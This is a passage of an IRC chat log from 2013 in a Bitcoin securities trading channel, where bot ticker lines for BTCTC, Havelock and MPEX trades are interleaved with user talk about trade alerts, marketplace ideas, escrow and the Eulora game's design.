2.01 BTC [-] Aug 28 19:41:35 [BTCTC] [BASIC-MINING] 2 @ 0.2005 = 0.401 BTC [-] Aug 28 19:41:36 [BTCTC] [BASIC-MINING] 1 @ 0.2001 BTC [-] Aug 28 19:41:37 [BTCTC] [BASIC-MINING] 2 @ 0.2 = 0.4 BTC [-] Aug 28 19:41:47 BASIC on sale Aug 28 19:42:12 [BTCTC] [ACTIVEMINING] 783 @ 0.004754 = 3.7224 BTC [+] Aug 28 19:42:13 [BTCTC] [ACTIVEMINING] 850 @ 0.004798 = 4.0783 BTC [+] Aug 28 19:42:15 [BTCTC] [ACTIVEMINING] 200 @ 0.0048 = 0.96 BTC [+] Aug 28 19:42:16 [BTCTC] [ACTIVEMINING] 453 @ 0.00481 = 2.1789 BTC [+] Aug 28 19:42:38 [HAVELOCK] [LABCO] 224 @ 0.0033 = 0.7392 BTC [+] Aug 28 19:42:41 wait dealcoin is a havelock listing Aug 28 19:42:46 i am falling outta the loop Aug 28 19:43:02 yep Aug 28 19:43:18 [HAVELOCK] [LABCO] 7 @ 0.0031999 = 0.0224 BTC [-] Aug 28 19:43:18 dealcoin is seedcoin guy? Aug 28 19:43:28 they should stop naming all this shit crypto, virtual, coin, active and massive. Aug 28 19:43:35 just stop it Aug 28 19:43:37 http://www.seedco.in/home/startups Aug 28 19:43:41 Seedcoin Startups | Seedcoin - Bitcoin Startup Virtual Incubator Aug 28 19:44:12 [BTCTC] [ACTIVEMINING] 1 @ 0.005 BTC [+] Aug 28 19:44:13 ppl have the imagination of a 5 year old Aug 28 19:44:14 [BTCTC] [ACTIVEMINING] 20 @ 0.005 = 0.1 BTC [+] Aug 28 19:44:17 err Aug 28 19:44:23 a 5 year old dog that is Aug 28 19:44:50 hmm so this guy incubates his own businesses Aug 28 19:44:51 [BTCTC] [ASICMINER-PT] 1 @ 2.779 BTC [-] Aug 28 19:44:53 uhhh Aug 28 19:45:01 I don't have the chatlog but earlier some of you said you had to be the first in bitcoin Aug 28 19:45:02 pretty sure thats now how it works Aug 28 19:45:15 not* Aug 28 19:45:19 was that meant for bitcoin mining, or any bitcoin business? Aug 28 19:45:27 [BTCTC] [LABCOIN] 3 @ 0.003174 = 0.0095 BTC [-] Aug 28 19:45:29 [BTCTC] [LABCOIN] 6 @ 0.003173 = 0.019 BTC [-] Aug 28 19:45:29 [BTCTC] [LABCOIN] 5 @ 0.003172 = 0.0159 BTC [-] Aug 28 19:45:30 [BTCTC] [LABCOIN] 22 @ 0.00317 = 0.0697 BTC [-] Aug 28 19:45:31 [BTCTC] [LABCOIN] 23 @ 0.003169 = 0.0729 BTC [-] Aug 28 19:45:33 [BTCTC] [LABCOIN] 40 @ 0.003168 = 0.1267 BTC [-] Aug 28 19:45:34 [BTCTC] [LABCOIN] 2 @ 0.003167 = 0.0063 BTC [-] Aug 28 19:45:35 [BTCTC] [LABCOIN] 50 @ 0.003166 = 0.1583 BTC [-] Aug 28 19:45:36 [BTCTC] [LABCOIN] 225 @ 0.003163 = 0.7117 BTC [-] Aug 28 19:45:37 [BTCTC] [LABCOIN] 900 @ 0.003162 = 2.8458 BTC [-] Aug 28 19:45:37 it was in context of a commoditized market Aug 28 19:45:38 [BTCTC] [LABCOIN] 174 @ 0.003133 = 0.5451 BTC [-] Aug 28 19:45:39 [BTCTC] [LABCOIN] 600 @ 0.003132 = 1.8792 BTC [-] Aug 28 19:45:40 [BTCTC] [LABCOIN] 98 @ 0.003131 = 0.3068 BTC [-] Aug 28 19:45:40 [BTCTC] [LABCOIN] 497 @ 0.003117 = 1.5491 BTC [-] Aug 28 19:45:41 [BTCTC] [LABCOIN] 854 @ 0.003116 = 2.6611 BTC [-] Aug 28 19:45:47 [HAVELOCK] [XBOND] 15 @ 0.00128899 = 0.0193 BTC [-] Aug 28 19:46:00 I don't understand :/ Aug 28 19:46:01 like textiles Aug 28 19:46:09 oh ok, yeah Aug 28 19:46:22 [BTCTC] [ACTIVEMINING] 1979 @ 0.005 = 9.895 BTC [+] Aug 28 19:46:40 [BTCTC] [ACTIVEMINING] 10 @ 0.0051 = 0.051 BTC [+] Aug 28 19:46:49 I guess it's an issue too for what I'd like to do, unless I also achieve expanding the market Aug 28 19:47:01 which is what market? Aug 28 19:47:15 activemining room for teh win Aug 28 19:47:25 a thing like bitmit/ebay/etc. Aug 28 19:47:41 ah Aug 28 19:47:41 [BTCTC] [BASIC-MINING] 3 @ 0.2 = 0.6 BTC [-] Aug 28 19:47:49 i think that one is up for grabs Aug 28 19:48:03 [BTCTC] [ACTIVEMINING] 90 @ 0.0051 = 0.459 BTC [+] Aug 28 19:48:05 since I'm going to have some "free time", and I'm fed up with bitmit not doing much… Aug 28 19:48:23 at least I'll learn how to interact with bitcoind :) Aug 28 19:49:15 [BTCTC] [LABCOIN] 535 @ 0.003283 = 1.7564 BTC [+] Aug 28 19:49:29 or just use bitpay or whatevs Aug 28 19:49:36 worked for ebat/paypal Aug 28 19:50:03 well, I don't want to deal with fiat at all (except for fixing prices *if users want to*) Aug 28 19:50:12 [BTCTC] [LABCOIN] 390 @ 0.003281 = 1.2796 BTC [-] Aug 28 19:50:13 [BTCTC] [LABCOIN] 974 @ 0.003282 = 3.1967 BTC [+] Aug 28 19:50:14 [BTCTC] [LABCOIN] 111 @ 0.003284 = 0.3645 BTC [+] Aug 28 19:50:15 [BTCTC] [LABCOIN] 2225 @ 0.003284 = 7.3069 BTC [+] Aug 28 19:50:27 hehe you may wanna use a different term Aug 28 19:50:36 and I spoke with a developer who had some ideas about doing escrow through the blockchain Aug 28 19:50:42 different term? Aug 28 19:50:45 'fixing prices' Aug 28 19:50:57 oh Aug 28 19:51:07 blockchain.info/wallet/escrow Aug 28 19:51:19 forgive my english second language Aug 28 19:51:20 [BTCTC] [ACTIVEMINING] 2021 @ 0.005 = 10.105 BTC [-] Aug 28 19:51:41 wow, I didn't know they did it already Aug 28 19:51:53 most people dont Aug 28 19:51:58 no one uses it afaik Aug 28 19:52:33 at least I want the idea that the stuff can still exist if the main site goes down Aug 28 19:52:33 aflak Aug 28 19:52:45 [BTCTC] [LABCOIN] 500 @ 0.003279 = 1.6395 BTC [-] Aug 28 19:52:47 [BTCTC] [LABCOIN] 750 @ 0.00328 = 2.46 BTC [+] Aug 28 19:52:58 [MPEX] [S.MPOE] 4650 @ 0.00087022 = 4.0465 BTC [-] Aug 28 19:53:04 [BTCTC] [ACTIVEMINING] 100 @ 0.00509 = 0.509 BTC [+] Aug 28 19:53:05 [BTCTC] [ACTIVEMINING] 1900 @ 0.0051 = 9.69 BTC [+] Aug 28 19:54:25 [BTCTC] [ACTIVEMINING] 25 @ 0.005099 = 0.1275 BTC [-] Aug 28 19:54:28 [BTCTC] [LABCOIN] 1800 @ 0.00328 = 5.904 BTC [+] Aug 28 19:54:48 [BTCTC] [TAT.ASICMINER] 15 @ 0.02583 = 0.3875 BTC [+] Aug 28 19:54:54 I remember seeing this Kryptotrader site being mentioned before, but damn why didn't I actually check it out lol Aug 28 19:55:34 [BTCTC] [LABCOIN] 8 @ 0.003283 = 0.0263 BTC [+] Aug 28 19:56:02 [BTCTC] [ASICMINER-PT] 1 @ 2.798 BTC [+] Aug 28 19:56:21 [BTCTC] [ASICMINER-PT] 1 @ 2.77 BTC [-] Aug 28 19:56:37 other than being pretty, why is it better than assbot? Aug 28 19:57:00 [BTCTC] [ACTIVEMINING] 4 @ 0.005099 = 0.0204 BTC [-] Aug 28 19:57:01 [BTCTC] [ACTIVEMINING] 100 @ 0.0051 = 0.51 BTC [+] Aug 28 19:57:02 [BTCTC] [ACTIVEMINING] 500 @ 0.0052 = 2.6 BTC [+] Aug 28 19:57:20 [BTCTC] [ASICMINER-PT] 1 @ 2.75 BTC [-] Aug 28 19:57:22 [BTCTC] [ASICMINER-PT] 4 @ 2.75 = 11 BTC [-] Aug 28 19:58:14 assbot isn't always around Aug 28 19:58:23 Plus, I can set alerts Aug 28 19:58:34 like 99% uptime no? Aug 28 19:58:49 [BTCTC] [ASICMINER-PT] 1 @ 2.73 BTC [-] Aug 28 19:58:51 [BTCTC] [ASICMINER-PT] 2 @ 2.73 = 5.46 BTC [-] Aug 28 19:58:53 I have no idea yet, I've been looking at it for a total of 10mins lol Aug 28 19:59:03 i meant assbot Aug 28 19:59:20 This past week alone, I've seen assbot go down for hours at a time Aug 28 19:59:31 I can't remember what day it was, but it was gone nearly all day Aug 28 19:59:43 and I had to have the realtime option open Aug 28 20:02:07 [HAVELOCK] [XBOND] 15 @ 0.00112506 = 0.0169 BTC [-] Aug 28 20:02:19 I would love and would donate to someone that would code a program that would do the same thing as kryptotrader frankly Aug 28 20:02:32 [BTCTC] [LABCOIN] 600 @ 0.003297 = 1.9782 BTC [+] Aug 28 20:02:42 I don't know if I could of put "would," anymore in that sentence... Aug 28 20:02:47 [BTCTC] [KENILWORTH] 21 @ 0.00161 = 0.0338 BTC [-] Aug 28 20:02:48 [BTCTC] [KENILWORTH] 2 @ 0.00161 = 0.0032 BTC [-] Aug 28 20:02:50 [BTCTC] [KENILWORTH] 177 @ 0.0016 = 0.2832 BTC [-] Aug 28 20:03:54 The author of assbot said they were making some changes to make him better, also was giving out a way to text him in case it does go down so he can get it back up Aug 28 20:03:57 [BTCTC] [LABCOIN] 100 @ 0.003297 = 0.3297 BTC [+] Aug 28 20:03:59 [BTCTC] [LABCOIN] 3900 @ 0.003298 = 12.8622 BTC [+] Aug 28 20:04:57 [BTCTC] [ACTIVEMINING] 1296 @ 0.005001 = 6.4813 BTC [-] Aug 28 20:05:42 [BTCTC] [TAT.ASICMINER] 1 @ 0.02799 BTC [+] Aug 28 20:07:38 [HAVELOCK] [AM100] 20 @ 0.0245 = 0.49 BTC [-] Aug 28 20:08:00 [MPEX] [S.MPOE] 1653 @ 0.00087022 = 1.4385 BTC [-] Aug 28 20:08:34 [BTCTC] [ACTIVEMINING] 185 @ 0.005 = 0.925 BTC [-] Aug 28 20:08:35 [BTCTC] [ACTIVEMINING] 2815 @ 0.005 = 14.075 BTC [-] Aug 28 20:09:23 That's nice and all, doesn't change the fact I would kill for an app. Man a smartphone app that has alarms to alert you of a dump, would be amazing for a day trader like me. Aug 28 20:09:43 I do love the work they do for assbot though :) Aug 28 20:09:46 a day trader is already trading no? Aug 28 20:09:50 imap push does all that Aug 28 20:10:06 all btct messages make my phone beep like sms Aug 28 20:10:21 google mail supports imap push Aug 28 20:10:30 I can't be up at all hours tat :P Aug 28 20:10:35 and has a crypted smtp server Aug 28 20:10:46 [BTCTC] [LABCOIN] 84 @ 0.00329 = 0.2764 BTC [-] Aug 28 20:11:49 [HAVELOCK] [AM100] 10 @ 0.0246 = 0.246 BTC [+] Aug 28 20:11:52 I suppose I could setup gmail to do that. Aug 28 20:12:40 if you have an android phone i recommend k9 mail Aug 28 20:13:04 I remember using k9 when it first came out years ago, I'm guessing it's improved Aug 28 20:13:04 my phone beeps the second i do a trade Aug 28 20:13:13 [BTCTC] [MININGCO.ETF] 2 @ 0.1198 = 0.2396 BTC [-] Aug 28 20:13:21 [BTCTC] [LABCOIN] 310 @ 0.00329 = 1.0199 BTC [-] Aug 28 20:13:21 it's the best i'm aware of par none Aug 28 20:14:02 hmm Aug 28 20:14:36 [HAVELOCK] [AM100] 2 @ 0.02450001 = 0.049 BTC [-] Aug 28 20:14:47 bar none Aug 28 20:14:59 right Aug 28 20:15:09 :) Aug 28 20:15:10 [BTCTC] [DMS.MINING] 1 @ 0.0034 BTC [-] Aug 28 20:15:17 excuse me Mr. TightAsFuck :p Aug 28 20:15:24 youknowit Aug 28 20:15:48 [BTCTC] [LABCOIN] 3 @ 0.00329 = 0.0099 BTC [-] Aug 28 20:16:33 Can it alert you to subject lines that contain certain text? Aug 28 20:16:47 Like blah blah .0045 or some shit like that Aug 28 20:16:53 [HAVELOCK] [AM100] 1 @ 0.02465 BTC [+] Aug 28 20:16:56 and alerts you once it reads .0045 Aug 28 20:17:03 that's up to your email client Aug 28 20:17:10 Within K9? Aug 28 20:17:13 i haven't tried k0's filters Aug 28 20:17:16 k9* Aug 28 20:17:17 Ah ok Aug 28 20:17:24 but i suppose Aug 28 20:17:33 That part would be most useful to me Aug 28 20:17:42 well Aug 28 20:17:55 u can then just set alerts on that new page Aug 28 20:17:55 you guise Aug 28 20:17:59 they goto email Aug 28 20:18:11 I already did that Aug 28 20:18:37 But this goes back to wanting an app that does all that without having to do 2 different processes Aug 28 20:18:59 Time to check out freelancer.com Aug 28 20:21:16 [HAVELOCK] [AM100] 1 @ 0.0254 BTC [+] Aug 28 20:21:31 I used cloudcoder once too Aug 28 20:22:58 I used Freelancer.com for a ton of work in the past. Aug 28 20:23:04 I'll check out cloudcoder too Aug 28 20:23:44 [BTCTC] [LABCOIN] 100 @ 0.003298 = 0.3298 BTC [+] Aug 28 20:23:45 [BTCTC] [LABCOIN] 1 @ 0.0033 BTC [+] Aug 28 20:23:46 [BTCTC] [LABCOIN] 100 @ 0.003376 = 0.3376 BTC [+] Aug 28 20:23:52 [BTCTC] [LABCOIN] 1000 @ 0.0034 = 3.4 BTC [+] Aug 28 20:23:52 [BTCTC] [LABCOIN] 1 @ 0.0034 BTC [+] Aug 28 20:24:30 [HAVELOCK] [AM1] 1 @ 2.69 BTC [-] Aug 28 20:24:53 [BTCTC] [LABCOIN] 598 @ 0.0034 = 2.0332 BTC [+] Aug 28 20:25:08 [MPEX] [S.MPOE] 173 @ 0.00087022 = 0.1505 BTC [-] Aug 28 20:25:11 [MPEX] [S.MPOE] 3277 @ 0.00086979 = 2.8503 BTC [-] Aug 28 20:25:38 http://trilema.com/2013/eulora-game-mechanics-etc/ Aug 28 20:25:42 Eulora - Game Mechanics etc. pe Trilema - Un blog de Mircea Popescu. Aug 28 20:25:50 lotta words. Aug 28 20:26:14 mircea_popescu it's neat but how will models be deployed to clients Aug 28 20:26:20 or is everything custom/user driven? Aug 28 20:26:44 [BTCTC] [DMS.MINING] 3 @ 0.0034 = 0.0102 BTC [-] Aug 28 20:27:57 [BTCTC] [ASICMINER-PT] 1 @ 2.74 BTC [+] Aug 28 20:28:28 thestringpuller i have this impression i don't understand the q. what do you mean !? Aug 28 20:31:52 [BTCTC] [ASICMINER-PT] 4 @ 2.71 = 10.84 BTC [-] Aug 28 20:31:54 [BTCTC] [ASICMINER-PT] 1 @ 2.705 BTC [-] Aug 28 20:31:55 [BTCTC] [ASICMINER-PT] 1 @ 2.703 BTC [-] Aug 28 20:31:56 [BTCTC] [ASICMINER-PT] 1 @ 2.702 BTC [-] Aug 28 20:31:58 [BTCTC] [ASICMINER-PT] 5 @ 2.702 = 13.51 BTC [-] Aug 28 20:31:59 [BTCTC] [ASICMINER-PT] 3 @ 2.7 = 8.1 BTC [-] Aug 28 20:32:00 [BTCTC] [ASICMINER-PT] 2 @ 2.7 = 5.4 BTC [-] Aug 28 20:32:01 [BTCTC] [ASICMINER-PT] 1 @ 2.69 BTC [-] Aug 28 20:32:02 [BTCTC] [ASICMINER-PT] 2 @ 2.68 = 5.36 BTC [-] Aug 28 20:33:04 [BTCTC] [TAT.ASICMINER] 16 @ 0.02603 = 0.4165 BTC [-] Aug 28 20:33:06 [BTCTC] [TAT.ASICMINER] 4 @ 0.02602 = 0.1041 BTC [-] Aug 28 20:35:23 [HAVELOCK] [CFIG] 20 @ 0.17 = 3.4 BTC [-] Aug 28 20:35:52 mircea_popescu: "skin it and make yourself a nice invisible helmet (or perhaps a kettle shaped cod piece) to proudly wear while promenading around the only tree." Aug 28 20:35:59 is there a plan for set dressing? Aug 28 20:36:38 vis-a-vis the people putting stuff in the world i.e. skyrim, morrowind etc... Aug 28 20:36:51 ah, it's going the classical route, there's a client which you download. Aug 28 20:37:03 the only way for players to put things in the world in that sense is to become part of the dev team Aug 28 20:37:09 [BTCTC] [ASICMINER-PT] 1 @ 2.642 BTC [-] Aug 28 20:37:17 but the client is hackable at the moment no? Aug 28 20:37:29 players can atm, put there own models in only they can see? Aug 28 20:37:34 sure, and it's going to stay that way. Aug 28 20:37:45 [BTCTC] [TAT.ASICMINER] 15 @ 0.02603 = 0.3905 BTC [+] Aug 28 20:37:46 people could in principle mod it, not so sure why they'd want to but hey. Aug 28 20:37:47 [BTCTC] [TAT.ASICMINER] 46 @ 0.02602 = 1.1969 BTC [-] Aug 28 20:37:48 [BTCTC] [TAT.ASICMINER] 16 @ 0.026 = 0.416 BTC [-] Aug 28 20:38:16 i guess if you have the patience you can re-make all models into your favourite pornstars. Aug 28 20:38:34 so world dev is slated for winter? Aug 28 20:39:03 just a version that's mostly workable on the code side should be here in oct. Aug 28 20:39:11 after which it's mostly "add more models" Aug 28 20:39:22 yea set dressing Aug 28 20:39:27 yea Aug 28 20:40:01 but seeing how I don't build the towns etc, it's mostly upon the players to pick where they want what to go. Aug 28 20:40:14 [BTCTC] [MININGCO.ETF] 2 @ 0.1199 = 0.2398 BTC [+] Aug 28 20:40:25 lol underestimating the effect of terrain and flora? Aug 28 20:40:35 [HAVELOCK] [AM100] 1 @ 0.02455 BTC [-] Aug 28 20:40:48 how do you mwean ? Aug 28 20:40:57 [BTCTC] [TAT.ASICMINER] 10 @ 0.026 = 0.26 BTC [-] Aug 28 20:41:25 [HAVELOCK] [AM100] 1 @ 0.02452 BTC [-] Aug 28 20:41:47 no player created things will have a large effect on the world as well, but as well there will be models needed for the player built constructions non? Prefabbed so to speak. Aug 28 20:42:04 [BTCTC] [TAT.ASICMINER] 7 @ 0.02601 = 0.1821 BTC [+] Aug 28 20:42:05 I'm just thinking from the Eve standpoint (sans secure space) Aug 28 20:42:06 [BTCTC] [TAT.ASICMINER] 4 @ 0.026 = 0.104 BTC [-] Aug 28 20:42:06 [BTCTC] [TAT.ASICMINER] 3 @ 0.026 = 0.078 BTC [-] Aug 28 20:42:32 well yes, everything's gonna be prefabbed. Aug 28 20:43:06 players just pick where the inn goes, not what the inn looks like. unless they want to upgrade it, in which case it changes looks, but still to what the upgraded inn looks not to some thing arbitrary. Aug 28 20:43:10 [BTCTC] [TAT.ASICMINER] 10 @ 0.026 = 0.26 BTC [-] Aug 28 20:43:22 [HAVELOCK] [AM100] 10 @ 0.0246 = 0.246 BTC [+] Aug 28 20:43:53 fo shizzle Aug 28 20:45:02 anyway, there is going to be some secure space in the sense that players can make their town guards beat up on violent ppl. Aug 28 20:46:21 im kinda curions on one score, as to how many towns will be run democratically vs authoritarianly Aug 28 20:46:24 and how well they'll do Aug 28 20:46:52 possibly the first time something like that's been seriously modelled. Aug 28 20:47:19 [BTCTC] [LABCOIN] 850 @ 0.0033 = 2.805 BTC [-] Aug 28 20:47:21 [BTCTC] [LABCOIN] 150 @ 0.0033 = 0.495 BTC [-] Aug 28 20:48:30 [BTCTC] [ACTIVEMINING] 1 @ 0.005079 BTC [+] Aug 28 20:48:33 [HAVELOCK] [HIM] 7 @ 0.1751 = 1.2257 BTC [+] Aug 28 20:49:07 [HAVELOCK] [XBOND] 35 @ 0.00112508 = 0.0394 BTC [+] Aug 28 20:49:14 [HAVELOCK] [XBOND] 13 @ 0.00112507 = 0.0146 BTC [-] Aug 28 20:49:21 [HAVELOCK] [XBOND] 10 @ 0.00112506 = 0.0113 BTC [-] Aug 28 20:49:36 [HAVELOCK] [XBOND] 10 @ 0.00112503 = 0.0113 BTC [-] Aug 28 20:49:52 [HAVELOCK] [XBOND] 701 @ 0.001125 = 0.7886 BTC [-] Aug 28 20:49:57 [BTCTC] [ACTIVEMINING] 1 @ 0.005079 BTC [+] Aug 28 20:50:11 [HAVELOCK] [XBOND] 4 @ 0.0011235 = 0.0045 BTC [-] Aug 28 20:50:17 [HAVELOCK] [XBOND] 44 @ 0.00111111 = 0.0489 BTC [-] Aug 28 20:50:24 [HAVELOCK] [XBOND] 24 @ 0.0011 = 0.0264 BTC [-] Aug 28 20:50:33 [HAVELOCK] [XBOND] 1 @ 0.0011 BTC [-] Aug 28 20:50:49 [HAVELOCK] [XBOND] 1920 @ 0.00109001 = 2.0928 BTC [-] Aug 28 20:50:57 [BTCTC] [LABCOIN] 225 @ 0.003251 = 0.7315 BTC [-] Aug 28 20:50:59 [BTCTC] [LABCOIN] 900 @ 0.00325 = 2.925 BTC [-] Aug 28 20:51:00 [BTCTC] [LABCOIN] 2875 @ 0.003201 = 9.2029 BTC [-] Aug 28 20:51:56 [BTCTC] [LABCOIN] 3000 @ 0.003201 = 9.603 BTC [-] Aug 28 20:51:57 [BTCTC] [LABCOIN] 4277 @ 0.0032 = 13.6864 BTC [-] Aug 28 20:51:58 [BTCTC] [ACTIVEMINING] 1 @ 0.005079 BTC [+] Aug 28 20:52:17 [BTCTC] [LABCOIN] 4805 @ 0.003201 = 15.3808 BTC [+] Aug 28 20:52:19 [BTCTC] [LABCOIN] 15195 @ 0.0032 = 48.624 BTC [-] Aug 28 20:52:58 [BTCTC] [LABCOIN] 4028 @ 0.0032 = 12.8896 BTC [-] Aug 28 20:53:00 [BTCTC] [LABCOIN] 1 @ 0.003251 BTC [+] Aug 28 20:53:32 [BTCTC] [ACTIVEMINING] 1 @ 0.00508 BTC [+] Aug 28 20:53:33 [BTCTC] [ACTIVEMINING] 3 @ 0.005089 = 0.0153 BTC [+] Aug 28 20:53:34 [BTCTC] [ACTIVEMINING] 3 @ 0.00509 = 0.0153 BTC [+] Aug 28 20:53:36 [BTCTC] [ACTIVEMINING] 1225 @ 0.005169 = 6.332 BTC [+] Aug 28 20:53:37 [BTCTC] [ACTIVEMINING] 115 @ 0.00517 = 0.5946 BTC [+] Aug 28 20:53:37 [BTCTC] [ACTIVEMINING] 10 @ 0.005172 = 0.0517 BTC [+] Aug 28 20:53:38 [BTCTC] [ACTIVEMINING] 200 @ 0.005173 = 1.0346 BTC [+] Aug 28 20:53:39 [BTCTC] [ACTIVEMINING] 843 @ 0.005174 = 4.3617 BTC [+] Aug 28 20:54:12 [BTCTC] [ACTIVEMINING] 622 @ 0.005079 = 3.1591 BTC [-] Aug 28 20:54:48 [BTCTC] [TAT.ASICMINER] 3 @ 0.02601 = 0.078 BTC [+] Aug 28 20:54:50 [BTCTC] [TAT.ASICMINER] 19 @ 0.026 = 0.494 BTC [-] Aug 28 20:54:51 [BTCTC] [TAT.ASICMINER] 78 @ 0.02585 = 2.0163 BTC [-] Aug 28 20:56:16 [BTCTC] [DMS.MINING] 231 @ 0.00336 = 0.7762 BTC [-] Aug 28 20:56:18 [BTCTC] [DMS.MINING] 500 @ 0.00336 = 1.68 BTC [-] Aug 28 20:56:41 [BTCTC] [ACTIVEMINING] 65 @ 0.005169 = 0.336 BTC [+] Aug 28 20:56:42 [BTCTC] [ACTIVEMINING] 50 @ 0.00517 = 0.2585 BTC [+] Aug 28 20:57:09 [BTCTC] [LABCOIN] 600 @ 0.003125 = 1.875 BTC [-] Aug 28 21:01:05 [BTCTC] [TAT.ASICMINER] 2 @ 0.02586 = 0.0517 BTC [+] Aug 28 21:01:06 [BTCTC] [TAT.ASICMINER] 13 @ 0.02585 = 0.3361 BTC [-] Aug 28 21:01:22 [BTCTC] [TAT.ASICMINER] 10 @ 0.02583 = 0.2583 BTC [-] Aug 28 21:01:23 [BTCTC] [TAT.ASICMINER] 10 @ 0.02582 = 0.2582 BTC [-] Aug 28 21:01:25 [BTCTC] [TAT.ASICMINER] 20 @ 0.02582 = 0.5164 BTC [-] Aug 28 21:01:26 [BTCTC] [TAT.ASICMINER] 20 @ 0.02581 = 0.5162 BTC [-] Aug 28 21:01:27 [BTCTC] [TAT.ASICMINER] 30 @ 0.02581 = 0.7743 BTC [-] Aug 28 21:01:55 [BTCTC] [TAT.ASICMINER] 1 @ 0.0258 BTC [-] Aug 28 21:01:57 [BTCTC] [TAT.ASICMINER] 10 @ 0.0258 = 0.258 BTC [-] Aug 28 21:03:27 [BTCTC] [LABCOIN] 120 @ 0.003299 = 0.3959 BTC [+] Aug 28 21:04:14 [BTCTC] [DMS.MINING] 4 @ 0.003355 = 0.0134 BTC [-] Aug 28 21:04:15 [BTCTC] [DMS.MINING] 8 @ 0.003354 = 0.0268 BTC [-] Aug 28 21:04:16 [BTCTC] [DMS.MINING] 333 @ 0.003353 = 1.1165 BTC [-] Aug 28 21:04:17 [BTCTC] [DMS.MINING] 23 @ 0.003353 = 0.0771 BTC [-] Aug 28 21:04:18 [BTCTC] [DMS.MINING] 302 @ 0.003353 = 1.0126 BTC [-] Aug 28 21:04:19 [BTCTC] [DMS.MINING] 330 @ 0.003353 = 1.1065 BTC [-] Aug 28 21:04:46 [BTCTC] [LABCOIN] 10 @ 0.003317 = 0.0332 BTC [+] Aug 28 21:04:51 [BTCTC] [TAT.ASICMINER] 89 @ 0.0258 = 2.2962 BTC [-] Aug 28 21:04:52 [BTCTC] [TAT.ASICMINER] 12 @ 0.02581 = 0.3097 BTC [+] Aug 28 21:05:18 [BTCTC] [TAT.ASICMINER] 78 @ 0.02581 = 2.0132 BTC [+] Aug 28 21:05:33 [BTCTC] [LABCOIN] 125 @ 0.003136 = 0.392 BTC [-] Aug 28 21:05:35 [BTCTC] [LABCOIN] 500 @ 0.003135 = 1.5675 BTC [-] Aug 28 21:05:36 [BTCTC] [LABCOIN] 750 @ 0.003125 = 2.3438 BTC [-] Aug 28 21:05:36 [BTCTC] [LABCOIN] 2000 @ 0.003124 = 6.248 BTC [-] Aug 28 21:05:37 [BTCTC] [LABCOIN] 1000 @ 0.003122 = 3.122 BTC [-] Aug 28 21:05:39 [BTCTC] [LABCOIN] 420 @ 0.003111 = 1.3066 BTC [-] Aug 28 21:05:40 [BTCTC] [LABCOIN] 540 @ 0.00311 = 1.6794 BTC [-] Aug 28 21:05:41 [BTCTC] [LABCOIN] 1140 @ 0.003109 = 3.5443 BTC [-] Aug 28 21:05:42 [BTCTC] [LABCOIN] 993 @ 0.003108 = 3.0862 BTC [-] Aug 28 21:05:43 [BTCTC] [LABCOIN] 3530 @ 0.003107 = 10.9677 BTC [-] Aug 28 21:07:06 [BTCTC] [LABCOIN] 40 @ 0.003316 = 0.1326 BTC [+] Aug 28 21:07:58 http://www.ebay.com/itm/USSR-Soviet-Russian-Military-Ferrite-Core-Memory-Stack-Cube-MANUAL-QUITE-RARE-/150928595047?pt=LH_DefaultDomain_0&hash=item23240b9867 Aug 28 21:08:02 Ussr Soviet Russian Military Ferrite Core Memory Stack Cube Manual Quite Rare | eBay Aug 28 21:08:09 how long before those shop up in asic renderings Aug 28 21:09:12 Thats cool Aug 28 21:11:14 [HAVELOCK] [AM100] 1 @ 0.02675 BTC [+] Aug 28 21:13:27 [BTCTC] [DMS.MINING] 493 @ 0.0034 = 1.6762 BTC [+] Aug 28 21:16:44 [BTCTC] [TAT.ASICMINER] 1 @ 0.0278 BTC [+] Aug 28 21:16:45 [BTCTC] [TAT.ASICMINER] 18 @ 0.0279 = 0.5022 BTC [+] Aug 28 21:16:47 [BTCTC] [TAT.ASICMINER] 32 @ 0.02796 = 0.8947 BTC [+] Aug 28 21:16:48 [BTCTC] [TAT.ASICMINER] 65 @ 0.02798 = 1.8187 BTC [+] Aug 28 21:17:14 [BTCTC] [TAT.ASICMINER] 1 @ 0.028 BTC [+] Aug 28 21:18:12 [BTCTC] [ASICMINER-PT] 1 @ 2.798 BTC [+] Aug 28 21:20:32 AM div is 0.01239987 per share Aug 28 21:21:11 no panic! :( Aug 28 21:21:55 [MPEX] [S.MPOE] 3340 @ 0.00087385 = 2.9187 BTC [+] Aug 28 21:21:56 soon Aug 28 21:22:18 [BTCTC] [DMS.MINING] 200 @ 0.00359 = 0.718 BTC [+] Aug 28 21:22:19 [BTCTC] [DMS.MINING] 31 @ 0.0036 = 0.1116 BTC [+] Aug 28 21:22:45 [BTCTC] [TAT.ASICMINER] 15 @ 0.0278 = 0.417 BTC [-] Aug 28 21:23:46 [BTCTC] [LABCOIN] 10 @ 0.003137 = 0.0314 BTC [-] Aug 28 21:23:47 [BTCTC] [LABCOIN] 43 @ 0.003136 = 0.1348 BTC [-] Aug 28 21:23:49 [BTCTC] [LABCOIN] 62 @ 0.003111 = 0.1929 BTC [-] Aug 28 21:23:56 [BTCTC] [LABCOIN] 250 @ 0.00311 = 0.7775 BTC [-] Aug 28 21:24:15 [BTCTC] [ASICMINER-PT] 3 @ 2.799 = 8.397 BTC [+] Aug 28 21:24:16 [BTCTC] [ASICMINER-PT] 1 @ 2.8 BTC [+] Aug 28 21:26:31 [BTCTC] [ASICMINER-PT] 1 @ 2.7 BTC [-] Aug 28 21:27:59 [HAVELOCK] [AM100] 1 @ 0.0265 BTC [-] Aug 28 21:28:06 [BTCTC] [TAT.ASICMINER] 1 @ 0.026 BTC [-] Aug 28 21:28:08 [BTCTC] [TAT.ASICMINER] 1 @ 0.0258 BTC [-] Aug 28 21:28:09 [BTCTC] [TAT.ASICMINER] 3 @ 0.02571 = 0.0771 BTC [-] Aug 28 21:28:10 [BTCTC] [TAT.ASICMINER] 17 @ 0.0257 = 0.4369 BTC [-] Aug 28 21:28:11 [BTCTC] [TAT.ASICMINER] 8 @ 0.02561 = 0.2049 BTC [-] Aug 28 21:28:13 [BTCTC] [TAT.ASICMINER] 10 @ 0.0256 = 0.256 BTC [-] Aug 28 21:28:14 [BTCTC] [TAT.ASICMINER] 1 @ 0.0256 BTC [-] Aug 28 21:28:15 [BTCTC] [TAT.ASICMINER] 30 @ 0.0256 = 0.768 BTC [-] Aug 28 21:28:16 [BTCTC] [TAT.ASICMINER] 2 @ 0.0255 = 0.051 BTC [-] Aug 28 21:28:17 [BTCTC] [TAT.ASICMINER] 1 @ 0.0254 BTC [-] Aug 28 21:28:18 [BTCTC] [TAT.ASICMINER] 1 @ 0.0252 BTC [-] Aug 28 21:28:18 [BTCTC] [TAT.ASICMINER] 25 @ 0.02511 = 0.6278 BTC [-] Aug 28 21:29:42 All 